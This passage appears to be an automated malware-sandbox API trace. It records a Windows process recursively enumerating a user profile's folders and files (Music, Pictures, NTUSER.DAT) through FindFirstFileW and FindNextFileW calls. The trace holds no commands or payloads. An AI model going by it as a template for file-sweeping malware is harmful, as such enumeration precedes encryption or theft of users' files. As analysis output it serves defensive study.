ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0184.479] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.479] lstrlenW (lpString="Get Windows Live.url") returned 20 [0184.480] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.481] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.481] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0184.481] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.481] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.481] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0184.481] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.481] lstrlenW (lpString="Links") returned 5 [0184.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.481] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.481] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.481] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.481] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.481] lstrlenW (lpString="desktop.ini") returned 11 [0184.482] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.482] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.482] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0184.482] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.482] lstrlenW (lpString="Local Settings") returned 14 [0184.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x6ee820, ftCreationTime.dwLowDateTime=0x6fd398, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0184.482] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.482] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac2ce40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac2ce40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0184.482] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.482] lstrlenW (lpString="Music") returned 5 [0184.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac2ce40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac2ce40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.483] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac2ce40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac2ce40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.483] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.483] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda21360, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0x62ef5710, ftLastAccessTime.dwHighDateTime=0x1d5e219, ftLastWriteTime.dwLowDateTime=0x62ef5710, ftLastWriteTime.dwHighDateTime=0x1d5e219, nFileSizeHigh=0x0, nFileSizeLow=0x2cd5, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="-KuUCMDYo3rcNSc0.m4a", cAlternateFileName="-KUUCM~1.M4A")) returned 1 [0184.483] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.483] lstrlenW (lpString="-KuUCMDYo3rcNSc0.m4a") returned 20 [0184.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\*", lpFindFileData=0x708a48 | out: lpFindFileData=0x708a48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28768ac0, ftCreationTime.dwHighDateTime=0x1d5e47d, ftLastAccessTime.dwLowDateTime=0xc30a8020, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xc30a8020, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.484] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x708a48 | out: lpFindFileData=0x708a48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28768ac0, ftCreationTime.dwHighDateTime=0x1d5e47d, ftLastAccessTime.dwLowDateTime=0xc30a8020, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xc30a8020, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.484] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.484] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x708a48 | out: lpFindFileData=0x708a48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x890a2dc0, ftCreationTime.dwHighDateTime=0x1d5d8ba, ftLastAccessTime.dwLowDateTime=0x1fc9e3c0, ftLastAccessTime.dwHighDateTime=0x1d5e565, ftLastWriteTime.dwLowDateTime=0x1fc9e3c0, ftLastWriteTime.dwHighDateTime=0x1d5e565, nFileSizeHigh=0x0, nFileSizeLow=0xdc93, dwReserved0=0x0, dwReserved1=0x0, cFileName="8qw_yHR38T2G.mp3", cAlternateFileName="8QW_YH~1.MP3")) returned 1 [0184.484] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.484] lstrlenW (lpString="8qw_yHR38T2G.mp3") returned 16 [0184.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\*", lpFindFileData=0x708d90 | out: lpFindFileData=0x708d90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4530a0, ftCreationTime.dwHighDateTime=0x1d5e0d1, ftLastAccessTime.dwLowDateTime=0x87aff1f0, ftLastAccessTime.dwHighDateTime=0x1d5e29f, ftLastWriteTime.dwLowDateTime=0x87aff1f0, ftLastWriteTime.dwHighDateTime=0x1d5e29f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.484] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x708d90 | out: lpFindFileData=0x708d90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4530a0, ftCreationTime.dwHighDateTime=0x1d5e0d1, ftLastAccessTime.dwLowDateTime=0x87aff1f0, ftLastAccessTime.dwHighDateTime=0x1d5e29f, ftLastWriteTime.dwLowDateTime=0x87aff1f0, ftLastWriteTime.dwHighDateTime=0x1d5e29f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.485] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.485] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x708d90 | out: lpFindFileData=0x708d90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac90840, ftCreationTime.dwHighDateTime=0x1d5dd14, ftLastAccessTime.dwLowDateTime=0x52534580, ftLastAccessTime.dwHighDateTime=0x1d5df7e, ftLastWriteTime.dwLowDateTime=0x52534580, ftLastWriteTime.dwHighDateTime=0x1d5df7e, nFileSizeHigh=0x0, nFileSizeLow=0x1cb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="-s904D_WtQRTJPT9J.m4a", cAlternateFileName="-S904D~1.M4A")) returned 1 [0184.485] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.485] lstrlenW (lpString="-s904D_WtQRTJPT9J.m4a") returned 21 [0184.485] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.485] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0184.485] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x708a48 | out: lpFindFileData=0x708a48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17dfc70, ftCreationTime.dwHighDateTime=0x1d5e0f7, ftLastAccessTime.dwLowDateTime=0xfc7f2a70, ftLastAccessTime.dwHighDateTime=0x1d5dca3, ftLastWriteTime.dwLowDateTime=0xfc7f2a70, ftLastWriteTime.dwHighDateTime=0x1d5dca3, nFileSizeHigh=0x0, nFileSizeLow=0x331f, dwReserved0=0x0, dwReserved1=0x0, cFileName="G8ndSE9BMkXakqjuMvd.m4a", cAlternateFileName="G8NDSE~1.M4A")) returned 1 [0184.485] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.486] lstrlenW (lpString="G8ndSE9BMkXakqjuMvd.m4a") returned 23 [0184.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\*", lpFindFileData=0x70a848 | out: lpFindFileData=0x70a848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814a0290, ftCreationTime.dwHighDateTime=0x1d5d842, ftLastAccessTime.dwLowDateTime=0x59b3a7d0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x59b3a7d0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.486] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x70a848 | out: lpFindFileData=0x70a848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814a0290, ftCreationTime.dwHighDateTime=0x1d5d842, ftLastAccessTime.dwLowDateTime=0x59b3a7d0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x59b3a7d0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.486] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.486] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x70a848 | out: lpFindFileData=0x70a848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x366618b0, ftCreationTime.dwHighDateTime=0x1d5e551, ftLastAccessTime.dwLowDateTime=0x4eb856c0, ftLastAccessTime.dwHighDateTime=0x1d5e237, ftLastWriteTime.dwLowDateTime=0x4eb856c0, ftLastWriteTime.dwHighDateTime=0x1d5e237, nFileSizeHigh=0x0, nFileSizeLow=0x14cea, dwReserved0=0x0, dwReserved1=0x0, cFileName="3XDF63xGn3E9rz6Ljyc5.m4a", cAlternateFileName="3XDF63~1.M4A")) returned 1 [0184.486] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.486] lstrlenW (lpString="3XDF63xGn3E9rz6Ljyc5.m4a") returned 24 [0184.486] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.486] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70a848 | out: hHeap=0x6b0000) returned 1 [0184.486] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x708a48 | out: lpFindFileData=0x708a48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2afeb80, ftCreationTime.dwHighDateTime=0x1d5dac3, ftLastAccessTime.dwLowDateTime=0xdc839050, ftLastAccessTime.dwHighDateTime=0x1d5d96d, ftLastWriteTime.dwLowDateTime=0xdc839050, ftLastWriteTime.dwHighDateTime=0x1d5d96d, nFileSizeHigh=0x0, nFileSizeLow=0xa252, dwReserved0=0x0, dwReserved1=0x0, cFileName="PoOpQS-BjYvqFXbwr.m4a", cAlternateFileName="POOPQS~1.M4A")) returned 1 [0184.486] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.487] lstrlenW (lpString="PoOpQS-BjYvqFXbwr.m4a") returned 21 [0184.487] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.487] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708a48 | out: hHeap=0x6b0000) returned 1 [0184.487] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28768ac0, ftCreationTime.dwHighDateTime=0x1d5e47d, ftLastAccessTime.dwLowDateTime=0xc30a8020, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xc30a8020, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="vxfh7QRk19daIUY5Gt", cAlternateFileName="VXFH7Q~1")) returned 0 [0184.487] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.487] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.487] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0184.487] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.487] lstrlenW (lpString="My Documents") returned 12 [0184.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x708a48, ftCreationTime.dwLowDateTime=0x6ee9c0, ftCreationTime.dwHighDateTime=0x1d5e47d, ftLastAccessTime.dwLowDateTime=0xc30a8020, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xc30a8020, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="vxfh7QRk19daIUY5Gt", cAlternateFileName="VXFH7Q~1")) returned 0xffffffff [0184.487] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.487] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0184.487] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.488] lstrlenW (lpString="NetHood") returned 7 [0184.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x708a48, ftCreationTime.dwLowDateTime=0x6ee9c0, ftCreationTime.dwHighDateTime=0x1d5e47d, ftLastAccessTime.dwLowDateTime=0xc30a8020, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xc30a8020, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="vxfh7QRk19daIUY5Gt", cAlternateFileName="VXFH7Q~1")) returned 0xffffffff [0184.488] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.488] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0184.488] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.488] lstrlenW (lpString="NTUSER.DAT") returned 10 [0184.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb187fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb187fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.488] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb187fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb187fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.488] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.488] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c0823c0, ftCreationTime.dwHighDateTime=0x1d5df2a, ftLastAccessTime.dwLowDateTime=0x90f61820, ftLastAccessTime.dwHighDateTime=0x1d5e54c, ftLastWriteTime.dwLowDateTime=0x90f61820, ftLastWriteTime.dwHighDateTime=0x1d5e54c, nFileSizeHigh=0x0, nFileSizeLow=0x14297, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="585C.bmp", cAlternateFileName="")) returned 1 [0184.488] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.489] lstrlenW (lpString="585C.bmp") returned 8 [0184.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\*", lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8c05ec90, ftCreationTime.dwHighDateTime=0x1d5d841, ftLastAccessTime.dwLowDateTime=0x8e2ad390, ftLastAccessTime.dwHighDateTime=0x1d5da5e, ftLastWriteTime.dwLowDateTime=0x8e2ad390, ftLastWriteTime.dwHighDateTime=0x1d5da5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.489] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8c05ec90, ftCreationTime.dwHighDateTime=0x1d5d841, ftLastAccessTime.dwLowDateTime=0x8e2ad390, ftLastAccessTime.dwHighDateTime=0x1d5da5e, ftLastWriteTime.dwLowDateTime=0x8e2ad390, ftLastWriteTime.dwHighDateTime=0x1d5da5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="..", cAlternateFileName="")) returned 1 [0184.489] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.489] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1131e0b0, ftCreationTime.dwHighDateTime=0x1d5e619, ftLastAccessTime.dwLowDateTime=0xb0e6c840, ftLastAccessTime.dwHighDateTime=0x1d5e19c, ftLastWriteTime.dwLowDateTime=0xb0e6c840, ftLastWriteTime.dwHighDateTime=0x1d5e19c, nFileSizeHigh=0x0, nFileSizeLow=0x12a0d, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="9 NzRDUbnqwUUqbJDtb.jpg", cAlternateFileName="9NZRDU~1.JPG")) returned 1 [0184.489] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.489] lstrlenW (lpString="9 NzRDUbnqwUUqbJDtb.jpg") returned 23 [0184.489] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.489] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6b0000) returned 1 [0184.489] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49164e00, ftCreationTime.dwHighDateTime=0x1d5dfb9, ftLastAccessTime.dwLowDateTime=0xa11c1670, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0xa11c1670, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="AvdSIE15bDl1Nh", 